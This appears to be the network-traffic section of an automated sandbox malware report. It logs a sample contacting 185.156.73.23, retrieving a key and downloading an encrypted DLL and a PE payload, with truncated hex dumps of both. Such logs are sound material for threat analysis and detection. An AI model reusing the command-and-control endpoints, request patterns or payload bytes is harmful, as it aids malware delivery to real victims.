                                                Dec 20, 2024 16:55:13.883397102 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.883456945 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.883987904 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.884145975 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.884182930 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.884356022 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.884944916 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.885088921 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.885340929 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.885421038 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.885867119 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.885946989 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.886069059 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.886141062 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.886933088 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.887012005 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.887254953 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.887330055 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.887762070 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.887913942 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.888828993 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.888840914 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.888851881 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.888902903 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.888983965 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.889787912 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.889914036 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.890161037 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.890708923 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.890768051 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.890929937 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.891011000 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.891577959 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.891623020 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:13.891654968 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:13.891700983 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:16.555186987 CET8049917185.156.73.23192.168.2.7
                                                Dec 20, 2024 16:55:16.555618048 CET4991780192.168.2.7185.156.73.23
                                                Dec 20, 2024 16:55:48.218903065 CET4991780192.168.2.7185.156.73.23

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 20, 2024 16:53:39.239218950 CET5569253192.168.2.71.1.1.1

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 20, 2024 16:53:39.239218950 CET192.168.2.71.1.1.10xc309Standard query (0)time.windows.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 20, 2024 16:53:38.649713993 CET1.1.1.1192.168.2.70x6b77No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                Dec 20, 2024 16:53:38.649713993 CET1.1.1.1192.168.2.70x6b77No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                Dec 20, 2024 16:53:39.376498938 CET1.1.1.1192.168.2.70xc309No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • 185.156.73.23

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749812185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:54:28.270270109 CET414OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:29.639238119 CET204INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:29 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:29.663031101 CET388OUTGET /dll/key HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:30.138691902 CET224INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:29 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 21
                                                Keep-Alive: timeout=5, max=99
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                                Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                                Dec 20, 2024 16:54:30.143945932 CET393OUTGET /dll/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: 1
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:30.705207109 CET1236INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:30 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                Content-Length: 97296
                                                Keep-Alive: timeout=5, max=98
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                                Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                                Dec 20, 2024 16:54:30.705270052 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                                Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                                Dec 20, 2024 16:54:30.705282927 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                                Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                                Dec 20, 2024 16:54:30.705550909 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                                Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                                Dec 20, 2024 16:54:30.705564976 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                                Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                                Dec 20, 2024 16:54:30.705575943 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                                Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                                Dec 20, 2024 16:54:30.705588102 CET1236INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                                Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                                Dec 20, 2024 16:54:30.705940962 CET1236INData Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                                Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
                                                Dec 20, 2024 16:54:30.713921070 CET1236INData Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                                Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                                Dec 20, 2024 16:54:30.713938951 CET556INData Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                                Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                                Dec 20, 2024 16:54:30.719819069 CET1236INData Raw: c4 2b ef bd 7d 2c 43 08 ed 7b 6b 29 6e 0e 1f c4 b7 82 38 dd 6c d9 86 f4 10 35 b0 a5 85 fc 11 b1 d2 2f 8d 77 64 e2 a9 08 d7 d5 3c d2 4a 6a 78 59 69 0f 6c e4 a9 b3 24 c6 f4 58 9a 23 39 7d c7 13 4c f7 63 fc 1e b2 57 02 df 46 1e fd 6d 66 5c 34 7b 69
                                                Data Ascii: +},C{k)n8l5/wd<JjxYil$X#9}LcWFmf\4{iEd"Fl@=l5scroIjyjGEQAQ.b3zH;7[R?b&=Z}BH(-uKDnVc]F?`(&z=eSO'gu)
                                                Dec 20, 2024 16:54:31.421030998 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:31.924001932 CET203INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:31 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=97
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:33.983324051 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:34.471118927 CET203INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:34 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=96
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:36.624047995 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:37.110507011 CET203INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:36 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=95
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0
                                                Dec 20, 2024 16:54:39.155319929 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:39.660120010 CET203INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:39 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=94
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749844185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:54:41.822261095 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:43.152314901 CET204INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:42 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.749854185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:54:45.324004889 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:46.666903019 CET204INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:46 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.749869185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:54:51.122102976 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:52.469388008 CET204INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:52 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.749879185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:54:54.952054977 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:56.316867113 CET204INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:55 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.749888185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:54:58.480931997 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:54:59.827917099 CET204INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:54:59 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.749897185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:55:02.423856020 CET395OUTGET /files/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: C
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:55:03.762080908 CET204INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:55:03 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Length: 1
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/html; charset=UTF-8
                                                Data Raw: 30
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.749908185.156.73.23807332C:\Users\user\Desktop\zSmMqGGeVy.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 20, 2024 16:55:06.967533112 CET394OUTGET /soft/download HTTP/1.1
                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                User-Agent: d
                                                Host: 185.156.73.23
                                                Connection: Keep-Alive
                                                Cache-Control: no-cache
                                                Dec 20, 2024 16:55:08.487539053 CET1236INHTTP/1.1 200 OK
                                                Date: Fri, 20 Dec 2024 15:55:07 GMT
                                                Server: Apache/2.4.52 (Ubuntu)
                                                Content-Disposition: attachment; filename="dll";
                                                Content-Length: 242176
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
